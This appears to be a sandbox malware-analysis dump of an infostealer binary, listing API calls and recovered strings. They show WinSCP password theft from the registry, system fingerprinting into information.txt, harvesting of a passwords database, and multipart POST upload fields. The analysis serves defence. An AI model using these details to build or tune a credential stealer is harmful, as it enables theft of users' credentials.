                                                                                                                                                                                                                                                                                      • String ID: "$------$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$build_id$https$mode$token

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      control_flow_graph 2179 418610-418622 GetModuleHandleA 2180 4187e6-41883e LoadLibraryA * 5 2179->2180 2181 418628-4187e1 call 404df0 * 21 2179->2181 2182 418840-418850 call 404df0 2180->2182 2183 418855-418857 2180->2183 2181->2180 2182->2183 2186 418859-418879 call 404df0 * 2 2183->2186 2187 41887e-418885 2183->2187 2186->2187 2189 418897-41889e 2187->2189 2190 418887-418892 call 404df0 2187->2190 2195 4188b0-4188b7 2189->2195 2196 4188a0-4188ab call 404df0 2189->2196 2190->2189 2202 4188b9-4188d9 call 404df0 * 2 2195->2202 2203 4188de 2195->2203 2196->2195 2202->2203
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,004185CA), ref: 00418615
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 004187EB
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004187FB
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(user32.dll), ref: 0041880B
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(crypt32.dll), ref: 0041881B
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041882B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LibraryLoad$HandleModule
                                                                                                                                                                                                                                                                                      • String ID: CloseHandle$CreateDCA$CreateEventA$CryptStringToBinaryA$ExitProcess$GetComputerNameA$GetCurrentProcess$GetDeviceCaps$GetProcAddress$GetProcessHeap$GetSystemInfo$GetSystemTime$GetUserDefaultLangID$GetUserNameA$GlobalMemoryStatusEx$LoadLibraryA$NtQueryInformationProcess$OpenEventA$ReleaseDC$Sleep$SystemTimeToFileTime$VirtualAlloc$VirtualAllocExNuma$VirtualFree$advapi32.dll$crypt32.dll$gdi32.dll$kernel32.dll$lstrcatA$lstrcpyA$lstrlenA$ntdll.dll$sscanf$user32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 2593893887-2466989068
                                                                                                                                                                                                                                                                                      • Opcode ID: b0d94fdff95e889663e20a71a92f9650b874d673670a684f651acea377882e8d
                                                                                                                                                                                                                                                                                      • Instruction ID: fa4f152899c94b2b2f6a7a6abf1eb692faa9c8451fb2198c09e274f393329d92
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0d94fdff95e889663e20a71a92f9650b874d673670a684f651acea377882e8d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2951B4B0A45750AFD711AF25FD42B257AA3EB80705354203FB902A71F3DBBA5450AFE8

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D9DD
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D9FA
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DA10
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DA26
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DA55
                                                                                                                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,00000004), ref: 0040DA7F
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040DA9C
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040DAD0
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040DAEC
                                                                                                                                                                                                                                                                                      • RegEnumKeyExA.ADVAPI32 ref: 0040DB1A
                                                                                                                                                                                                                                                                                      • RegEnumKeyExA.ADVAPI32 ref: 0040DB9D
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040DB43
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,00000004,?,?,?), ref: 0040DC49
                                                                                                                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,00000400,?,?,00421509,?,?,?), ref: 0040DD2C
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0042150A,?,?,Password: ), ref: 0040DD54
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?), ref: 0040DDDF
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040DDFE
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,passwords.txt), ref: 0040DE5F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411EA0: wsprintfA.USER32 ref: 00411EB5
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memset$CloseValuelstrcpy$EnumOpenlstrcatlstrlen$??3@_invalid_parameter_noinfo_noreturnwsprintf
                                                                                                                                                                                                                                                                                      • String ID: Login: $:22$Host: $HostName$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$k@$passwords.txt$#

Control-flow Graph: control_flow_graph 2574, 413510-413e47 (legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410920: GetProcessHeap.KERNEL32(?,?,Version: ,0042150A,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 0041092D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410920: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 0041093B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410920: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 00410942
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410920: wsprintfA.USER32 ref: 00410971
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411120: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 004111AE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411120: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF), ref: 004111CF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411120: RegCloseKey.ADVAPI32(?), ref: 004111D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411120: CharToOemA.USER32(?,?), ref: 004111EB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410700: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410716
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410700: memset.MSVCRT ref: 0041073F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410700: lstrcatA.KERNEL32(?,00000000,?,00000000,00000000,0000000E,?,?,?), ref: 0041076A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410700: lstrcatA.KERNEL32(?,0041FE21,?,00000000,00000000,0000000E,?,?,?), ref: 00410780
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,Path: ,?,?,00421508,?,?,?,?,?,?,HWID: ,?,?,00421509), ref: 0041371F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411CC0: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411CDD
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411CC0: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CF4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411CC0: CloseHandle.KERNEL32(00000000), ref: 00411CFB
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: GetProcessHeap.KERNEL32 ref: 004107D4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004107E2
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: GetProcessHeap.KERNEL32 ref: 004107F4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410802
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0041081A
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?), ref: 00410837
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: RegCloseKey.ADVAPI32(?), ref: 00410840
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 0041086D
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 0041088A
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: RegCloseKey.ADVAPI32(?), ref: 00410893
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108E0: GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108E0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108E0: GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                        • Part of subcall function 004110A0: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004110B3
                                                                                                                                                                                                                                                                                        • Part of subcall function 004110A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004110BE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004110A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004110C9
                                                                                                                                                                                                                                                                                        • Part of subcall function 004110A0: ReleaseDC.USER32(00000000,00000000), ref: 004110D4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004110A0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004110E0
                                                                                                                                                                                                                                                                                        • Part of subcall function 004110A0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004110EE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004110A0: wsprintfA.USER32 ref: 004110FA
                                                                                                                                                                                                                                                                                        • Part of subcall function 004109F0: GetKeyboardLayoutList.USER32(00000000,00000000,0042150A), ref: 00410A11
                                                                                                                                                                                                                                                                                        • Part of subcall function 004109F0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410A23
                                                                                                                                                                                                                                                                                        • Part of subcall function 004109F0: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410A2D
                                                                                                                                                                                                                                                                                        • Part of subcall function 004109F0: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00410A4D
                                                                                                                                                                                                                                                                                        • Part of subcall function 004109F0: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000,00000200,?,?,?), ref: 00410AB4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004109F0: LocalFree.KERNEL32(00000000), ref: 00410B18
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410990: GetProcessHeap.KERNEL32(?,?,00421509,?,?,?,?,?,?,AV: ,?,?,00421509,?,?,?), ref: 0041099D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410990: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004109AB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410990: GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004109B2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410990: wsprintfA.USER32 ref: 004109DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410B30: GetProcessHeap.KERNEL32 ref: 00410B42
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410B50
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410B30: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 00410B68
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410B30: RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 00410B85
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410B30: RegCloseKey.ADVAPI32(?), ref: 00410B8E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410BE0: GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,?), ref: 00410C19
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410BE0: GetLastError.KERNEL32 ref: 00410C1F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410BE0: wsprintfA.USER32 ref: 00410C7B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410BA0: GetSystemInfo.KERNEL32(?), ref: 00410BAA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410BA0: wsprintfA.USER32 ref: 00410BBE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410CB0: GetProcessHeap.KERNEL32(?,Windows: ,?,?,00421508,?,?,Work Dir: In memory,?,?,00421509,?,?,?,?,00000000), ref: 00410CC1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410CB0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 00410CCF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410CB0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 00410CE7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410CB0: wsprintfA.USER32 ref: 00410D0F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410FE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411009
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410FE0: Process32First.KERNEL32(00000000,00000128), ref: 00411017
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410FE0: Process32Next.KERNEL32(00000000,00000128), ref: 00411027
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410FE0: Process32Next.KERNEL32(00000000,00000128), ref: 0041107A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410FE0: CloseHandle.KERNEL32(00000000), ref: 00411085
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410D80: RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00410DCE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410D80: RegEnumKeyExA.KERNEL32 ref: 00410E10
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410D80: wsprintfA.USER32 ref: 00410E89
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410D80: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410EA0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410D80: RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00410ECD
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410D80: lstrlenA.KERNEL32(?), ref: 00410EDC
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00421509,?,?,?,?,?,?,Install Date: ,?,?,00421509,?,?,00000000), ref: 00413D8B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$Alloc$wsprintf$Open$Close$QueryValuelstrcatlstrcpy$lstrlen$CreateInfoInformationLocalNameProcess32$CapsCurrentDeviceHandleKeyboardLayoutListLocaleNextTime$CharComputerDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleObjectProcessorProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                                                                      • String ID: yA$ yA$AV: $Computer Name: $Cores: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001,?,?,?,?,00000009,?,00420BBE,?,?,?,C:\ProgramData\,0042150A), ref: 00407E8D
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EAE
                                                                                                                                                                                                                                                                                      • PathFileExistsA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004089FB), ref: 00407EC9
                                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32 ref: 00407F01
                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00407F15
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00407F2C
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 00407F39
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407F50
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00407F6B
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00407F77
                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 00407F85
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00407F99
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00420AE3), ref: 00407FA1
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00407FBC
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,?,00000000), ref: 00408052
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0040805C
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00408064
                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 0040806E
                                                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00408081
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004089FB), ref: 0040809C
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,_passwords.db), ref: 00407FC4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411D20: GetProcessHeap.KERNEL32 ref: 00411D72
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411D20: HeapAlloc.KERNEL32(00000000,00000000,000000FA), ref: 00411D80
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411D20: wsprintfW.USER32 ref: 00411D8F
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040814E
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00408158
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040815B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$FileProcesslstrcat$lstrcpy$Free$AllocCloseHandleSleeplstrlen$AllocateCopyCreateDeleteExistsPathReadSizeSystemTimewsprintf
                                                                                                                                                                                                                                                                                      • String ID: C:\ProgramData\$_passwords.db
                                                                                                                                                                                                                                                                                      • API String ID: 3968722238-2269847733

Control-flow Graph (graph 3356, first block 402aa0-402b51; rendering not preserved)
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
